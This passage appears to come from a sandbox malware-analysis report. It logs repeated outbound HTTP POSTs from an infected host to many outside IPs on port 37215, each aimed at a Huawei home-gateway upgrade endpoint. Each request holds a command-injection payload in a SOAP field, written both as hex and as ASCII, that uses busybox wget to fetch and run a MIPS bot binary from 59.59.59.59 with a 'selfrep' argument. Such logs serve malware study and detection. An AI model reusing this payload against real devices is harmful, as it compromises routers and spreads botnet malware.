2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:14.189270020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:14.617194891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:15.481307030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:17.177071095 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:20.761122942 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:27.672898054 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1798192.168.2.1557174197.148.235.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.955935955 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1799192.168.2.1556900129.72.180.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.956049919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1800192.168.2.1543010133.206.174.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.956068993 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1801192.168.2.1549964222.26.107.23237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.956162930 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1802192.168.2.155233237.216.24.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:13.956187963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
